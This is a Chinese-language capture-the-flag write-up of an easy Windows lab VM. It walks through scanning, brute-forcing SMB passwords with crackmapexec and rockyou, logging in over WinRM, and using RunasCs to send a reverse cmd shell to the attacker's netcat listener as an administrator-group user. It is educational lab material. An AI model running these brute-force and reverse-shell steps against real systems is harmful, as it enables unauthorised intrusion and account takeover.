难度:easy
kali:192.168.56.104
靶机:192.168.56.196
> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:b4:46:04 PCS Systemtechnik GmbH
192.168.56.196 08:00:27:23:b8:a2 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.957 seconds (130.81 hosts/sec). 3 responded端口扫描
> nmap -sV -A 192.168.56.196 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-14 21:27 CST
Nmap scan report for 192.168.56.196
Host is up (0.00036s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:23:B8:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-14T19:39:38
|_ start_date: N/A
|_nbstat: NetBIOS name: WIN-IURF14RBVGV, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:23:b8:a2 (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 5h59m55s
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 192.168.56.196
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 747.61 seconds开启了smb服务,msrpc服务,先去看下80端口的http服务
目录扫描
> gobuster dir -u http://192.168.56.196/ -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.196/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php,bak,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 345413 / 1323366 (26.10%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 347732 / 1323366 (26.28%)
===============================================================
Finished
===============================================================web服务大概没什么东西,不过给了一个用户名nica
smb探测
先看一下有没有共享目录
> smbclient -L \\192.168.56.196
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED尝试一下无密码登录
> smbclient -L 192.168.56.196 -U nica
Password for [WORKGROUP\nica]:
session setup failed: NT_STATUS_LOGON_FAILURE尝试爆破,用用户名为nica
hydra -l nica -P /usr/share/wordlists/rockyou.txt 192.168.56.196 smb -t 1
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-14 21:45:27
[DATA] max 1 task per 1 server, overall 1 task, 14344400 login tries (l:1/p:14344400), ~14344400 tries per task
[DATA] attacking smb://192.168.56.196:445/
[ERROR] invalid reply from target smb://192.168.56.196:445/换一个工具crackmapexec
> crackmapexec smb 192.168.56.196 -u nica -p /usr/share/wordlists/rockyou.txt
SMB 192.168.56.196 445 WIN-IURF14RBVGV [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
SMB 192.168.56.196 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:123456 STATUS_LOGON_FAILURE
SMB 192.168.56.196 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:12345 STATUS_LOGON_FAILURE
SMB 192.168.56.196 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:123456789 STATUS_LOGON_FAILURE
SMB 192.168.56.196 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:password STATUS_LOGON_FAILURE
SMB 192.168.56.196 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\nica:iloveyou STATUS_LOGON_FAILURE
...
...
SMB 192.168.56.196 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\nica:hardcore 拿到密码 hardcore
看一下共享目录
> smbclient -L //192.168.56.196 -U nica --option='client min protocol=SMB2'
Password for [WORKGROUP\nica]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Admin remota
C$ Disk Recurso predeterminado
IPC$ IPC IPC remota
SMB1 disabled -- no workgroup available> smbclient.py nica:hardcore@192.168.56.196
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
C$
IPC$
# use ADMIN$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use C$
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
# use IPC$
# ls
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 InitShutdown
-rw-rw-rw- 4 Mon Jan 1 08:05:43 1601 lsass
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 ntsvcs
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 scerpc
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-2ec-0
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 epmapper
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-1ac-0
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 LSM_API_service
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 eventlog
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-36c-0
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 atsvc
-rw-rw-rw- 4 Mon Jan 1 08:05:43 1601 wkssvc
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-390-0
-rw-rw-rw- 3 Mon Jan 1 08:05:43 1601 W32TIME_ALT
-rw-rw-rw- 4 Mon Jan 1 08:05:43 1601 srvsvc
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-21c-0
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-3e8-0
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 Winsock2\CatalogChangeListener-224-0
-rw-rw-rw- 1 Mon Jan 1 08:05:43 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER然而并没有什么东西
想到5985端口开放,用evil-winrm连接一下
> evil-winrm -i 192.168.56.196 -u nica -p hardcore
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nica\Documents> dir
*Evil-WinRM* PS C:\Users\nica\Documents> cd ..
*Evil-WinRM* PS C:\Users\nica> dir
Directorio: C:\Users\nica
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 9:12 AM Desktop
d-r--- 9/26/2023 6:44 PM Documents
d-r--- 9/15/2018 9:12 AM Downloads
d-r--- 9/15/2018 9:12 AM Favorites
d-r--- 9/15/2018 9:12 AM Links
d-r--- 9/15/2018 9:12 AM Music
d-r--- 9/15/2018 9:12 AM Pictures
d----- 9/15/2018 9:12 AM Saved Games
d-r--- 9/15/2018 9:12 AM Videos
-a---- 9/26/2023 6:44 PM 10 user.txt
*Evil-WinRM* PS C:\Users\nica> type user.txt
HMVWI****提权administrator
拿到user flag,翻了一下系统并没有什么重要文件
*Evil-WinRM* PS C:\Users\nica> net user
Cuentas de usuario de \\
-------------------------------------------------------------------------------
Administrador akanksha DefaultAccount
Invitado nica WDAGUtilityAccount
El comando se ha completado con uno o m s errores.查看用户信息发现管理员用户名是akanksha
继续尝试密码爆破
> crackmapexec smb 192.168.56.196 -u Akanksha -p /usr/share/wordlists/rockyou.txt
SMB 192.168.56.196 445 WIN-IURF14RBVGV [*] Windows 10.0 Build 17763 x64 (name:WIN-IURF14RBVGV) (domain:WIN-IURF14RBVGV) (signing:False) (SMBv1:False)
SMB 192.168.56.196 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\Akanksha:123456 STATUS_LOGON_FAILURE
SMB 192.168.56.196 445 WIN-IURF14RBVGV [-] WIN-IURF14RBVGV\Akanksha:12345 STATUS_LOGON_FAILURE
...
...
SMB 192.168.56.196 445 WIN-IURF14RBVGV [+] WIN-IURF14RBVGV\Akanksha:sweetgirl 拿到密码 sweetgirl,不过winrm这次连不上了,可能权限不够
> evil-winrm -i 192.168.56.196 -u akanksha -p sweetgirl
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1使用工具https://github.com/antonioCoco/RunasCs,以指定用户权限执行命令
*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe
Info: Uploading /root/Desktop/RunasCs.exe to C:\Users\nica\RunasCs.exe
Error: Upload failed. Check filenames or paths: No such file or directory - No such file or directory /root/Desktop/RunasCs.exe
*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe
Info: Uploading /root/Desktop/RunasCs.exe to C:\Users\nica\RunasCs.exe
Data: 68948 bytes of 68948 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nica> dir
Directorio: C:\Users\nica
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 9:12 AM Desktop
d-r--- 9/26/2023 6:44 PM Documents
d-r--- 9/15/2018 9:12 AM Downloads
d-r--- 9/15/2018 9:12 AM Favorites
d-r--- 9/15/2018 9:12 AM Links
d-r--- 9/15/2018 9:12 AM Music
d-r--- 9/15/2018 9:12 AM Pictures
d----- 9/15/2018 9:12 AM Saved Games
d-r--- 9/15/2018 9:12 AM Videos
-a---- 7/14/2024 10:49 PM 51712 RunasCs.exe
-a---- 9/26/2023 6:44 PM 10 user.txt
*Evil-WinRM* PS C:\Users\nica> ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.56.104:4567
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2922e6$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2496 created in background.> nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.196] 49674
Microsoft Windows [Versi�n 10.0.17763.107]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>成功弹回了shell
C:\Users>whoami /groups
whoami /groups
INFORMACI�N DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
============================================ ============== ============================================== ========================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
WIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\INTERACTIVE Grupo conocido S-1-5-4 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESI�N EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa��a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci�n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta S-1-16-8192 所属组是Idministritirs 也就是Administrator
C:\Users\Administrador>dir
dir
El volumen de la unidad C no tiene etiqueta.
El n�mero de serie del volumen es: 26CD-AE41
Directorio de C:\Users\Administrador
26/09/2023 18:36 <DIR> .
26/09/2023 18:36 <DIR> ..
26/09/2023 15:11 <DIR> 3D Objects
26/09/2023 15:11 <DIR> Contacts
26/09/2023 15:11 <DIR> Desktop
26/09/2023 15:11 <DIR> Documents
26/09/2023 15:11 <DIR> Downloads
26/09/2023 15:11 <DIR> Favorites
26/09/2023 15:11 <DIR> Links
26/09/2023 15:11 <DIR> Music
26/09/2023 15:24 16.418 new.cfg
26/09/2023 15:11 <DIR> Pictures
26/09/2023 18:36 13 root.txt
26/09/2023 15:11 <DIR> Saved Games
26/09/2023 15:11 <DIR> Searches
26/09/2023 15:11 <DIR> Videos
2 archivos 16.431 bytes
14 dirs 45.911.502.848 bytes libres
C:\Users\Administrador>type root.txt
type root.txt
HMV1******